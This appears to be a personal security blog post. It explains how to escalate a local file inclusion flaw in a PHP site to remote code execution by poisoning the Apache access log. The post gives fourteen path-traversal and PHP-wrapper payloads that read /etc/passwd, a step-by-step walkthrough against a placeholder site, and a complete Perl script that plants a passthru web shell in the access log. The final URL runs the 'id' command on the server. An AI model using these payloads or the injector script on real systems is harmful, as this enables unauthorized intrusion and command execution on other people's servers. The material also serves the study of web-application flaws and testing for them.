LFI to RCE by injecting access_log

Hardik Solanki
5 min readApr 24, 2020

--

Hello Everyone,

Today i just wanna share a trick from “Local File Inclusion/File Path Traversal to Remote Code Execution” by injecting the access_log, which has a Critical impact.

What is LFI? Local file inclusion is a vulnerability in some of the web applications because the website read files from the server but the developer doesn’t filter the input from the user he trusts them :D.
What is RCE? Remote Code execution this is a bug give the attacker permissions to execute a command on the server.

For example when you search on website you found a Local File Inclusion (LFI) this is good but this issue just give you access to the files in the server just files you will get a cool bounty from it but if it’s a Remote code execution (RCE) it will be awesome Bounty so now every server has a log files this files save any request to the website with the path and User-Agent and sometimes the Referer value we will use this file access.log you just will do some brute force to know the path of this file or any logs file

The following content describes the various methods or a types based on my current knowledge which might be useful when expanding a “LFI”.

[1] Basic LFI Payload :

http://xyz.com/index.php?page=../../../../../../../../../etc/passwd

[2] NullByte Injection:

http://xyz.com/index.php?page=../../../../../../../../../etc/passwd%00

[3] NullByte Injection with URL Encoding:

http://xyz.com/index.php?page=../../../../../../../../../etc/passwd%2500

[4] Simple URL Encoding:

http://xyz.com/index.php?page=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd

[5] Double URL Encoding:

http://xyz.com/index.php?page=%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd

[6] Base64 Encoded:

http://xyz.com/index.php?page=Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==

[7] Filter Evasion-1:

http://xyz.com/index.php?page=../\../\../\../\../\../\../\etc/passwd

[8] Filter Evasion-2:

http://xyz.com/index.php?page=..\/..\/..\/..\/..\/..\/..\/etc/passwd

[9] Filter Evasion-3:

http://xyz.com/index.php?page=....//....//....//....//....//etc/passwd

LFI [ PHP wrappers ] Payloads:-

[10] Simple PHP Filter:

http://xyz.com/index.php?page=php://filter/resource=/etc/passwd

[11] PHP ROT-13 Encoded Filter:

http://xyz.com/index.php?page=php://filter/read=string.rot13/resource=/etc/passwd

[12] PHP Base-64 Encoded Filter:

http://xyz.com/index.php?page=php://filter/convert.base64-encode/resource=/etc/passwd

[13] PHP Base-64 Encoded Filter (Case Insensitive):

http://xyz.com/index.php?page=pHp://FilTer/convert.base64-encode/resource=/etc/passwd

[14] PHP Filters (In Terms of Directory Traversal):

http://xyz.com/index.php?page=php://filter/resource=../../../etc/passwd

So, Let’s Start with an Example:

I have a target: “http://xyz.com/index.php?page=aboutus" & it’s vulnerable to LFI/FPT.

Steps to reproduce:-

Step 1: Enter the following URL in the Address bar of the browser:

http://xyz.com/index.php?page=aboutus

Step 2: Append the following Basic LFI payload in the url in “page” parameter:

../../../../../../../../../../../../../../../etc/passwd

Basic LFI Payload didn’t respond successfully

Note: Basic LFI payload didn’t worked

Step 3: As basic LFI payload didn't worked. So, we will now try with “NullByte Injection Payload”, as shown below.

../../../../../../../../../../../../../../../etc/passwd%00

YaaY! NullByte Injection Payload worked successfully and hence we got the response in browser

It was confirmed that LFI was there. So, now my target was to escalate it to get RCE.

Now the idea was to get access to some file may be log files which could provide some user controller input (in order to run some command) .

Step 4: Now what you have to do is, you have search for log files. To find the log files location you need to find httpd.conf first.

So, on searching or using Automate scan, E.g.Intruder, we have to search for “httpd.conf”.

Here we found the httpd.conf path, E.g. “/etc/httpd/conf/httpd.conf%00”, now paste this in URL in “page” parameter. This is shown in below screenshot.

httpd.conf file

View source (ctrl+u) for a better view of their httpd.conf.

Here i found Access_Log file

So I tried reading access logs ,error logs , different location to access them.

Step 5: Now, after some minutes of searching and reading log files, i found something like “access_log”, which i want. So I tried reading that access logs, as shown below.

http://xyz.com/index.php?page=../../../../../../../../../../../../../../../home/pro_99/xyz.com/access_log%00

Here i can able to access the “access_log”

Step 6: Now, we have to search for “v0pcr3w” (Web Shell Remote Code Execution) word in “access_log”. In my case their is no word like “v0pcr3w” was found in “access_log”.

So, now we have to inject the “access_log”. So below is the Perl script which is use to inject the access_log Or you can download it here.

#!/usr/bin/perl -w

use IO::Socket::INET;

my $host = $ARGV[0];
my $port = $ARGV[1];

print "*** Injecting $host:$port access log...\n";

my $rce = "<?if(get_magic_quotes_gpc()){ \$_GET[cmd]=stripslashes(\$_GET[cmd]);} passthru(\$_GET[cmd]);?>";
$sock = IO::Socket::INET->new(PeerAddr=>$host, PeerPort=>$port, Proto=>"tcp") || die "Cant connect to $host:$port!\n";
print $sock "GET /v0pcr3w ".$rce." HTTP/1.1\r\n";
print $sock "Host: ".$host."\r\n";
print $sock "Connection: close\r\n\r\n";
close($sock);

print "*** Done!\n\n";

Now the point is, how to inject the script ? so for that, below are the steps to install perl and inject the script in access_log:

  1. Install the perl in you environment.
  2. Save the above perl script as “Inject_Log.pl”.
  3. Now, Run it as “perl Inject_Log.pl <target> 80”, as shown in following screenshot.
Perl Script Injected Successfully in “access_log”

Step 7: If the perl script is injected successfully, then Open the access_log again and search for “v0pcr3w”. If the word is there then we’ve successfully injected the access_log. This is shown in below screenshot.

Wow! This shows that we have successfully injected the access_log

Step 8: Now run below mentioned line to execute command on server

“/home/pro_99/xyz.com/access_log%00&cmd=id” and you’ll see the “id” command executed.

So, Enter the following final URL in the Address bar of the browser & hit enter:

http://xyz.com/index.php?page=../../../../../../../../../../../../../../../home/pro_99/xyz.com/access_log%00&cmd=id

BOOM!…………

Our Command Executed Successfully “GET /v0pcr3w uid=48(apache) gid=48(apache) groups=48(apache),500(webadmin)”. This is shown in below screenshot.

Our Command Executed Successfully

I hope this topic help someone, thank you for reading.

Suggestions are most welcome as always. I will keep posting the Security related findings. If you got anything from it, you can press the clap icon below and ya, don’t forget to follow me on linkedin & twitter as well. See you all next time. :)

Happy hacking!

Cheers!

--

--

Hardik Solanki
Hardik Solanki

Written by Hardik Solanki

Security in IT is like locking your house or car — it doesn’t stop the bad guys, but if it’s good enough they may move on to an easier target.

Responses (1)